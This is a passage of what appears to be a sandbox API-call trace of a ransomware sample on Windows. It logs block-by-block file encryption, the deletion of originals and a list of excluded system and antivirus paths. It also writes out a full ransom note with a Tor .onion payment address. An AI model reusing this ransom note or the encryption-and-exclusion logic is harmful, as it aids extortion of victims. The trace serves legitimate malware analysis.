hKey=0x9ad378, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.097] GetLastError () returned 0x0 [0160.097] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.097] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.097] CryptEncrypt (in: hKey=0x9ad378, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.097] GetLastError () returned 0x0 [0160.097] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.097] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.097] CryptEncrypt (in: hKey=0x9ad378, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.097] GetLastError () returned 0x0 [0160.097] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.097] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.097] CryptEncrypt (in: hKey=0x9ad378, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.097] GetLastError () returned 0x0 [0160.097] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.097] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.097] CryptEncrypt (in: hKey=0x9ad378, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.097] GetLastError () returned 0x0 [0160.097] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.097] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.097] CryptEncrypt (in: hKey=0x9ad378, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.097] GetLastError () returned 0x0 [0160.097] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.098] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.098] CryptEncrypt (in: hKey=0x9ad378, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.098] GetLastError () returned 0x0 [0160.098] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.098] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.098] CryptEncrypt (in: hKey=0x9ad378, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.098] GetLastError () returned 0x0 [0160.098] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.098] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.098] CryptEncrypt (in: hKey=0x9ad378, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.098] GetLastError () returned 0x0 [0160.098] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.098] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.098] CryptEncrypt (in: hKey=0x9ad378, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.098] GetLastError () returned 0x0 [0160.098] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.098] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.098] CryptEncrypt (in: hKey=0x9ad378, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.098] GetLastError () returned 0x0 [0160.098] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.098] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.099] CryptEncrypt (in: hKey=0x9ad378, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.099] GetLastError () returned 0x0 [0160.099] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.099] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.099] CryptEncrypt (in: hKey=0x9ad378, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.099] GetLastError () returned 0x0 [0160.099] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.099] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.099] CryptEncrypt (in: hKey=0x9ad378, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x110) returned 1 [0160.099] GetLastError () returned 0x0 [0160.099] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x110, lpOverlapped=0x0) returned 1 [0160.099] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x0, lpOverlapped=0x0) returned 1 [0160.099] WriteFile (in: hFile=0x588, lpBuffer=0x29012e8*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesWritten=0x2d7e15c*=0x0, lpOverlapped=0x0) returned 1 [0160.099] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\pl-PL\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\pl-pl\\tipresx.dll.mui")) returned 0x20 [0160.099] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\pl-PL\\tipresx.dll.mui", dwFileAttributes=0x20) returned 0 [0160.100] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\pl-PL\\tipresx.dll.mui") returned 1 [0160.100] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\pl-PL\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\pl-pl\\tipresx.dll.mui")) returned 0 [0160.100] wcscpy (in: _Dest=0x2d7dcb4, _Source="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\pl-PL\\tipresx.dll.mui" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\pl-PL\\tipresx.dll.mui") returned="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\pl-PL\\tipresx.dll.mui" [0160.100] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\pl-PL\\tipresx.dll.mui" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\pl-PL") returned 1 [0160.100] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\pl-PL", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7debc | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\pl-PL\\.xXE4A5.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\pl-pl\\.xxe4a5.tmp")) returned 0xe4a5 [0160.103] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\pl-PL\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\pl-pl\\tipresx.dll.mui"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\pl-PL\\.xXE4A5.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\pl-pl\\.xxe4a5.tmp"), dwFlags=0x1) returned 0 [0160.103] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\pl-PL\\.xXE4A5.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\pl-pl\\.xxe4a5.tmp")) returned 1 [0160.103] CryptDestroyKey (hKey=0x9ad378) returned 1 [0160.103] wcslen (_String="OK") returned 0x2 [0160.103] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0160.103] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0160.103] CryptDestroyKey (hKey=0x9ad738) returned 1 [0160.103] CryptDestroyHash (hHash=0x9ad2f8) returned 1 [0160.104] CryptReleaseContext (hProv=0x8e3110, dwFlags=0x0) returned 1 [0160.104] FindNextFileW (in: hFindFile=0x9ad338, lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 0 [0160.104] GetLastError () returned 0x12 [0160.104] FindClose (in: hFindFile=0x9ad338 | out: hFindFile=0x9ad338) returned 1 [0160.104] _wfopen (_FileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\pl-PL\\Recovers your files.html" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\pl-pl\\recovers your files.html"), _Mode="w") returned 0x77ac1268 [0160.104] fputs (in: _Str=" Encrypted files!

Your Key: a8ba77dad846516d1a6737c4237beea3b25e325279bbf473010960209657e13a

Encrypted files!

All your files are encrypted.Using AES256-bit encryption and RSA-2048-bit encryption.
Making it impossible to recover files without the correct private key.
If you are interested in getting is the key and recover your files
You should proceed with the following steps.

The only way to decrypt your files safely is to buy the Descrypt and Private Key software.

Any attempts to restore your files with the third-party software will be fatal for your files!

Important use Firefox or Chrome browser

To proceed with the purchase you must access one of the link below

If neither of the links is online for a long period of time, there is another way to open it, you should install the Tor Browser

If your personal page is not available for a long period there is another way to open your personal page - installation and use of Tor Browser:

  1. run your Internet browser (if you do not know what it is run the Internet Explorer);
  2. enter or copy the address https://www.torproject.org/download/download-easy.html.en into the address bar of your browser and press ENTER;
  3. wait for the site loading;
  4. on the site you will be offered to download Tor Browser; download and run it, follow the installation instructions, wait until the installation is completed;
  5. run Tor Browser;
  6. connect with the button 'Connect' (if you use the English version);
  7. a normal Internet browser window will be opened after the initialization;
  8. type or copy the address

    https://lylh3uqyzay3lhrd.onion

    in this browser address bar;
  9. press ENTER;
  10. the site should be loaded; if for some reason the site is not loading wait for a moment and try again.
If you have any problems during installation or use of Tor Browser, please, visit https://www.youtube.com and type request in the search bar 'Install Tor Browser Windows' and you will find a lot of training videos about Tor Browser installation and use.

Your Key: a8ba77dad846516d1a6737c4237beea3b25e325279bbf473010960209657e13a
", _File=0x77ac1268 | out: _File=0x77ac1268) returned 0 [0160.105] fclose (in: _File=0x77ac1268 | out: _File=0x77ac1268) returned 0 [0160.105] wcslen (_String="Unfortunately crypted files: ") returned 0x1d [0160.105] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0160.105] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0160.105] wcslen (_String="Fortunately ignored files because of filters: ") returned 0x2e [0160.105] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0160.105] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0160.105] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\pt-BR\\*", pszSpec="*.exe") returned 0 [0160.105] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\pt-BR\\*", pszSpec="*.dll") returned 0 [0160.105] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\pt-BR\\*", pszSpec="*.lnk") returned 0 [0160.105] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\pt-BR\\*", pszSpec="*.bat") returned 0 [0160.105] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\pt-BR\\*", pszSpec="*.ini") returned 0 [0160.105] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\pt-BR\\*", pszSpec="*.msi") returned 0 [0160.105] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\pt-BR\\*", pszSpec="*.scf") returned 0 [0160.105] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\pt-BR\\*", pszSpec="*pagefile.sys*") returned 0 [0160.105] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\pt-BR\\*", pszSpec="*NTUSER.DAT*") returned 0 [0160.105] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\pt-BR\\*", pszSpec="*AppData*") returned 0 [0160.105] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\pt-BR\\*", pszSpec="*\\winrar\\*") returned 0 [0160.105] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\pt-BR\\*", pszSpec="*\\Internet Explorer\\*") returned 0 [0160.105] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\pt-BR\\*", pszSpec="*\\java\\*") returned 0 [0160.105] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\pt-BR\\*", pszSpec="*\\TeamViewer\\*") returned 0 [0160.105] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\pt-BR\\*", pszSpec="*\\windows\\*") returned 0 [0160.105] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\pt-BR\\*", pszSpec="*\\ESET\\*") returned 0 [0160.105] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\pt-BR\\*", pszSpec="*\\AVG\\*") returned 0 [0160.105] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\pt-BR\\*", pszSpec="*\\AVIRA\\*") returned 0 [0160.105] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\pt-BR\\*", pszSpec="*\\AVAST Software\\*") returned 0 [0160.106] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\pt-BR\\*", pszSpec="*Atheros*") returned 0 [0160.106] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\pt-BR\\*", pszSpec="*Realtek*") returned 0 [0160.106] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\pt-BR\\*", pszSpec="*bootmgr*") returned 0 [0160.106] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\pt-BR\\*", pszSpec="*boot*") returned 0 [0160.106] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\pt-BR\\*", pszSpec="*boot*") returned 0 [0160.106] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\pt-BR\\*", pszSpec="*CONFIG.SYS*") returned 0 [0160.106] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\pt-BR\\*", pszSpec="*IO.SYS*") returned 0 [0160.106] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\pt-BR\\*", pszSpec="*MSDOS.SYS*") returned 0 [0160.106] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\pt-BR\\*", pszSpec="*NTDETECT.COM*") returned 0 [0160.106] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\pt-BR\\*", pszSpec="*ntldr*") returned 0 [0160.106] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\pt-BR\\*", pszSpec="*chrome*") returned 0 [0160.106] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\pt-BR\\*", pszSpec="*opera*") returned 0 [0160.106] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\pt-BR\\*", pszSpec="*firefox*") returned 0 [0160.106] wcslen (_String="\\\\?\\") returned 0x4 [0160.106] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\pt-BR\\*", lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 0x9ad6b8 [0160.106] wcscmp (_String1=".", _String2=".") returned 0 [0160.106] FindNextFileW (in: hFindFile=0x9ad6b8, lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 1 [0160.106] wcscmp (_String1="..", _String2=".") returned 1 [0160.106] wcscmp (_String1="..", _String2="..") returned 0 [0160.106] FindNextFileW (in: hFindFile=0x9ad6b8, lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 1 [0160.106] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*NMCRYPT") returned 0 [0160.106] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*Recovers your files.html") returned 0 [0160.106] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.exe") returned 0 [0160.106] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.dll") returned 0 [0160.106] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.lnk") returned 0 [0160.106] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.bat") returned 0 [0160.106] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.ini") returned 0 [0160.106] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.msi") returned 0 [0160.106] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.scf") returned 0 [0160.106] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*pagefile.sys*") returned 0 [0160.106] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*NTUSER.DAT*") returned 0 [0160.106] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*AppData*") returned 0 [0160.106] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\winrar\\*") returned 0 [0160.106] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\Internet Explorer\\*") returned 0 [0160.106] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\java\\*") returned 0 [0160.106] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\TeamViewer\\*") returned 0 [0160.107] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\windows\\*") returned 0 [0160.107] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\ESET\\*") returned 0 [0160.107] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\AVG\\*") returned 0 [0160.107] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\AVIRA\\*") returned 0 [0160.107] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\AVAST Software\\*") returned 0 [0160.107] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*Atheros*") returned 0 [0160.107] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*Realtek*") returned 0 [0160.107] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*bootmgr*") returned 0 [0160.107] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*boot*") returned 0 [0160.107] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*boot*") returned 0 [0160.107] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*CONFIG.SYS*") returned 0 [0160.107] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*IO.SYS*") returned 0 [0160.107] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*MSDOS.SYS*") returned 0 [0160.107] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*NTDETECT.COM*") returned 0 [0160.107] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*ntldr*") returned 0 [0160.107] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*chrome*") returned 0 [0160.107] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*opera*") returned 0 [0160.107] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*firefox*") returned 0 [0160.107] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\pt-BR\\tipresx.dll.mui", pszSpec="*") returned 1 [0160.107] strlen (_Str="NMoreira") returned 0x8 [0160.107] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.107] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.107] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.107] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.107] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.107] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.107] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.107] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.107] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.107] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: 